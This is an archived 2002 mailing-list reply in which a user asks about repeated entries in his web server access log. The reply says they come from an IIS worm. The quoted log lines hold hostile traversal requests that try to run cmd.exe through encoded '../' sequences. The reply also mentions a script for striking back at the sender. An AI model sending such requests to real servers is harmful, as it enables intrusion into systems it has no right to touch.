Re: httpd access log question

Subject: Re: httpd access log question
From: Greg Jetter (greg@lazymountain.com)
Date: Wed Jan 16 2002 - 18:34:34 AKST

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
• Next message: The Alaskan Bear: "Re: httpd access_logs-security"
• Previous message: Mike Tibor: "Re: cdrw question"
• In reply to: Justin Dieters: "httpd access log question"
• Reply: Greg Jetter: "Re: httpd access log question"
• Reply: Greg Jetter: "Re: httpd access log question"

On Wednesday 16 January 2002 02:29 pm, you wrote:
> Hello all. I was browsing through my httpd access logs on my server today
> and I noticed several lines that were repeated a few dozen times within the
> span of a couple hours, all from the same ip (it looks to be a gci cable
> modem ip) An of the lines is attached to the end of this message. Other
> than these several blocks all together, there are no other instances I can
> find. My question is does anyone know what all these accesses might mean?
> It looks like it's trying to find some WinNT/2K files, so I'm thinking it
> might be a ''run-of-the-mill'' Nimda attempt or somthing similar. What do
> you all think? Should I be concerned? This was more than a month ago, and I
> don't see anything else since then..
>
> Thanks,
> Justin
> enderak@yahoo.com
>
> --------------------
>
> 24.237.72.15 - - [05/Dec/2001:19:22:34 -0900] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 288
> 24.237.72.15 - - [05/Dec/2001:19:22:34 -0900] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 286
> 24.237.72.15 - - [05/Dec/2001:19:22:34 -0900] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
> 24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
> 24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
> 24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 327
> 24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 327
> 24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
>y stem32/cmd.exe?/c+dir HTTP/1.0" 404 343
> 24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> 24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> 24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> 24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> 24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
> 24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
>
>
>
It one of those Windows IIS virus or worms , my apache logs are full of them
, some one on the list posted a script you can run to bounce back those
attempts at breaking in to whoever sent them , I can't recall just who
posted it so maybe they will post again.

>
> _________________________________________________________
> Do You Yahoo!?
> Get your free @yahoo.com address at http://mail.yahoo.com

• Next message: The Alaskan Bear: "Re: httpd access_logs-security"
• Previous message: Mike Tibor: "Re: cdrw question"
• In reply to: Justin Dieters: "httpd access log question"
• Reply: Greg Jetter: "Re: httpd access log question"
• Reply: Greg Jetter: "Re: httpd access log question"

This archive was generated by hypermail 2a23 : Wed Jan 16 2002 - 18:27:55 AKST